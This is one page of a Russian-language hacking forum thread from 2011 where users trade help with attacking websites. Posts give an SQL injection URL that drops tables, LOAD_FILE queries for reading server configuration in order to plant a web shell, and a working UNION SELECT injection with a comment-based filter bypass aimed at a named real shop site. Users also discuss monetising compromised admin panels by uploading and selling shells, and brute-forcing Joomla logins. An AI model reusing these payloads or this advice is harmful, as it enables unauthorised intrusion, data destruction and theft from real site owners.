Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 920 of 1207
  1. Goodwin_

    Goodwin_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    подскажите, пожалуйста, верный.
     
    #18381 Goodwin_, 26 Nov 2011
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    в случий MySQL удалить данные никак не получится
     
    _________________________
    #18382 Konqi, 26 Nov 2011
  3. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Если все очень криво, то можно:
    HTML:
    http://site.ru/php.php?id=123';DROP+TABLES+logs--+1
    ; означает конец первого запроса.
    P.S. Возможно я не прав...
     
    #18383 tabletkO, 26 Nov 2011
  4. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    1) термин залиться уже не раз использовался в теме "Энциклопедия уязвимых скриптов" => даже для меня он кажется очевидным
    2) админка по адресу /admin/ - sorry
    3) шелл мне нужен на другом сайте, на этом же движке так что можешь смело продать его за 2$

    P.S: Спасибо за помощь пользователю Gorev
     
    #18384 vaddd, 26 Nov 2011
    Last edited: 26 Nov 2011
  5. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    ты не прав в том случае, если это MySQL, нельзя использовать два запроса к базе в одном обращении.
     
    #18385 Melfis, 26 Nov 2011
  6. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    всем привет подскажите чё лучше зделать есть админки на форумах штук 30 не юзанные траф от 800 до 2 к с форума, чё здеалать залить шеллы проифреймить как лучше зделать партнёрки посоветуете под шеллы заранее респект за любой совет?.
     
    #18386 boortyhuhtyu, 26 Nov 2011
    Last edited: 26 Nov 2011
  7. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    отписать админам о уязвимостях.
     
    #18387 d1v, 26 Nov 2011
    1 person likes this.
  8. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    нет ето не вариант дядя монеты нужны.
     
    #18388 boortyhuhtyu, 26 Nov 2011
  9. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    тогда иди на завод. и вообще ты разделом ошибся. не пиши сюда больше.
     
    #18389 d1v, 26 Nov 2011
  10. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Если админы нормальные, могут отблагодарить :) ну или залей шеллы и продай ;)
     
    #18390 stepashka_, 26 Nov 2011
    1 person likes this.
  11. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    иди на завод сам еп.
     
    #18391 boortyhuhtyu, 26 Nov 2011
  12. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Здравствуйте ещё раз. Интересует следующий вопрос:
    Имеется доступ к phpmyadmin.
    Права пользователя: ALL PRIVILEGES
    Версия phpmyadmin: 3.3.4
    Sql-injection на сайте не приводит к раскрытию путей.
    Какие есть способы залить шелл?
    Спасибо за ответ.
     
    #18392 Aniweste, 26 Nov 2011
  13. PRosTo_LEva

    PRosTo_LEva Elder - Старейшина

    Joined:
    18 Apr 2007
    Messages:
    449
    Likes Received:
    132
    Reputations:
    106
    Предположение - если временно сменить название базы данных - скрипт при попытке подключится выдаст ошибку с раскрытием путей.
     
    #18393 PRosTo_LEva, 26 Nov 2011
  14. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    LOAD_FILE('/путь/до/конфиг/апача');
    Список можно посмотреть тут: http://forum.antichat.ru/thread49775.html
     
    #18394 Boolean, 26 Nov 2011
    1 person likes this.
  15. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Делаю sql-запрос - получаю ответ
    Code:
    [B]#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD_FILE('/etc/apache/conf/httpd.conf')' at line 1[/B]
    :eek:
    Что именно я делаю не правильно? :(
     
    #18395 Aniweste, 26 Nov 2011
    Last edited: 26 Nov 2011
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    select LOAD_FILE('/etc/apache/conf/httpd.conf')
     
    #18396 попугай, 26 Nov 2011
  17. nakurukataоm

    nakurukataоm New Member

    Joined:
    5 Sep 2010
    Messages:
    26
    Likes Received:
    2
    Reputations:
    0
    Здравствуйте, у меня есть вопрос по nmap:
    Распознаёт ли nmap кириллицу? Хочу использовать функцию брута joomla на форуме, но все ники кириллицей и пароли кириллицей сразу отправляются в невалид. как с этим можно побороться?
     
    #18397 nakurukataоm, 27 Nov 2011
  18. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    тем кто знает хорошо тему заливки файлов.

    Если что пишите в ПМ все остальное не могу выложить в паблик
     
    #18398 lion-art, 27 Nov 2011
  19. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    http://www.shopoldcoloradocity.com/content.php?id=-97+order+14-- (FALSE)

    http://www.shopoldcoloradocity.com/content.php?id=-97 1=1 (Blind working)

    http://www.shopoldcoloradocity.com/content.php?id=-97 and substring(@@version,1,1)=4

    Unknown column '20and' in 'where clause

    Even

    http://www.shopoldcoloradocity.com/content.php?id=-97 and substring(@@version,1,1)=5

    Any solution?
     
    #18399 lightangel, 27 Nov 2011
  20. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    lightangel,
    http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,version(),3,4,user(),6,7,8,9,10,11,12--
    Site filter symbol "+". But you can use /**/ ;)
     
    #18400 tabletkO, 27 Nov 2011
(You must log in or sign up to post here.)
Page 920 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.